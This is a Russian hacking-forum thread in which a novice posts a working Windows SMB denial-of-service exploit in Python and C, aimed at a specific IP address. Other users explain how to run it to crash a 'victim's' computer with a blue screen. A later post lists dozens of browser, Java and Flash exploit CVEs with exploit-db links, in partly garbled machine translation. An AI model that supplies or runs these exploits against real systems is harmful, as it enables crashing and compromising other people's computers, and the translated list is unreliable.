Добрый день ! Я новичок в плане взлома да и вобще ) Мне конечно очень понравилась программа Metasploit framework, но всех эксплоитов которые там находятся, не совсем хватает, по этому я порылся в гугле и т.д. в итоге нашел эксплоит для ОС windows 7 его содержание такое : from socket import socket host = "92.54.70.230", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close() я так понимаю он написан на python ... пытаюсь запустить с консоли и вот что получаю : from: can't read /var/mail/socket host: couldn't get address for '92.54.70.230,': not found /home/blood/1st.py: строка 4: ошибка синтаксиса около неожиданной лексемы `(' /home/blood/1st.py: строка 4: `buff = (' ладно ... дальше пробую запустить сначала python и потом из него мой файл : Python 2.6.6 (r266:84292, Sep 15 2010, 15:52:39) [GCC 4.4.5] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> '/home/blood/1st.py' >>> и ничего подскажете пожалуйста как мне быть?? что бы я мог использовать сторонние эксплоиты ... Зарание благодарен...
Это значит что сплойт выполнился и сплойт на дос атаку чтоб проверить его работу лучше быть за компом жертвы чтоб понять. Есть так-же вариант что smb блокируеться фаером попробуй на виртуалке потестить или на большом количестве компов.
По идее на компе жертвы появится BSOD , но пинг показывает что живой , спасибо usr-bin, я теперь хотя бы знаю чем юзать подобные сплойты ...
Но как быть с этим ??? char buff[] = "\x00\x00\x00\x90" "\xff\x53\x4d\x42" "\x72\x00\x00\x00" "\x00\x18\x53\xc8" "\x00\x26" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x ff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x 45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x 20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x 30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x 20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x 31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x 02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x 20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x 32\x2e" "\x30\x30\x32\x00"; int main(int argc, char *argv[]) { if (argc < 2) { printf("Syntax: %s [ip address]\r\n", argv[0]); return -1; } WSADATA WSAdata; WSAStartup(MAKEWORD(2, 2), &WSAdata); SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); char *host = argv[1]; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = htons((unsigned short)445); ssin.sin_addr.s_addr = inet_addr(host); printf("Connecting to %s:445... ", host); if (connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) { printf("ERROR!\r\n"); return 0; } printf("OK\r\n"); printf("Sending malformed packet... "); if (send(sock, buff, sizeof(buff), 0) <= 0) { printf("ERROR!\r\n"); return 0; } printf("OK\r\n"); printf("Successfully sent packet!\r\nTarget should be crashed...\r\n"); closesocket(sock); WSACleanup(); return 1; } ведь я так понимаю функция "printf("Successfully sent packet!\r\nTarget should be " должна хоть что то выводить на экран а там все та же картина --->>> >>> '/home/blood/1st.py' '/home/blood/1st.py' >>>
Так это вообще код на С++. Ты что, его через Питон "пропускаешь"? Их можно запускать через программу lcc.exe. Почитай тему https://forum.antichat.ru/thread26510.html
кому надо MDAC CVE-2006-0003 https: //www.exploit-...exploits/16561/ Microsoft Internet Explorer - COM CreateObject выполнение кода PDF CVE-2010-0188 https: // WWW .exploit -... эксплойты / 16670 / Adobe Acrobat Bundled LibTIFF переполнением целочисленного Java CVE-2011-3544 по протоколу HTTPS: //www.exploit-...exploits/18171/ Java Applet Rhino Script Engine Удаленное выполнение кода FF CVE-2012- 1710 * Mozilla Firefox использовать против плагинов уязвимости Oracle Java CVE-2012-0507 https: //www.exploit-...exploits/18679/ Java AtomicReferenceArray Тип Нарушение Уязвимость IE CVE-2013-0074 по протоколу HTTPS: //www.exploit- ... подвигах / 29858 / Microsoft Internet Explorer - COALineDashStyleArray небезопасный доступ к памяти (MS12-022) IE CVE-2013-0322 https: //www.exploit-...exploits/32904/ Microsoft Internet Explorer - CMarkup Use-вечернюю Free (MS14-012) IE CVE-2013-1347 https: //www.exploit-...exploits/25294/ Microsoft Internet Explorer CGenericElement Объект Use-After-Free уязвимости Java CVE-2013-1493 https: // WWW. эксплуатируют -... эксплойты / 24904 / Java CMM удаленное выполнение кода Java CVE-2013-2423 https: //www.exploit-...exploits/24976/ Java Applet Отражение Тип Путаница удаленное выполнение кода JRE CVE-2013-2465 по протоколу HTTPS : //www.exploit-...exploits/27705/ удаленное выполнение кода уязвимости в Oracle JRE IE CVE-2013-2551 https: //www.exploit-...exploits/26175/ Microsoft Internet Explorer - COALineDashStyleArray Целочисленное переполнение ( MS13-009) FF CVE-2013-3993 * Mozilla Firefox использовать против плагинов уязвимости IBM Flash - CVE-2014-0497 https: //www.exploit-...exploits/33212/ Adobe Flash Player Integer Underflow удаленное выполнение кода IE CVE -2014-6332 https: //www.exploit-...exploits/35229/ Microsoft Internet Explorer <= 11 - OLE Automation Массив удаленное выполнение кода (1) (MS14-064) Flash - CVE-2015-0311 https: // www.exploit -... эксплойты / 36360 / Adobe Flash Player ByteArray UncompressViaZlibVariant использования после Java CVE-2015-2419 JavaScript уязвимости в Internet Explorer 10 и 11 (MS15-065) EK * CVE-2015-2445 * ASLR Обход Есть нет известных подвигов в дикой природе. Flash - CVE-2015-3043 https: //www.exploit-...exploits/37536/ Adobe Flash Player Nellymoser Audio Декодирование Переполнение буфера флэш CVE-2015-3113 * Adobe Flash 0-день ( в настоящее время заплата) раскрыты в июне 2015 Вспышка CVE-2015-3105 по протоколу HTTPS: //www.exploit-...exploits/37448/ Adobe Flash Player рисования затенение повреждению памяти Flash - CVE-2015-5119 по протоколу HTTPS: //www.exploit-. ..exploits / 37523 / Adobe Flash Player ByteArray использования после вспышки CVE-2015-5122 https: //www.exploit-...exploits/37599/ Adobe Flash opaqueBackground использования после вспышки CVE-2015-7645 https: // www.exploit -... эксплойты / 38490 / Adobe Flash IExternalizable.writeExternal - Тип Путаница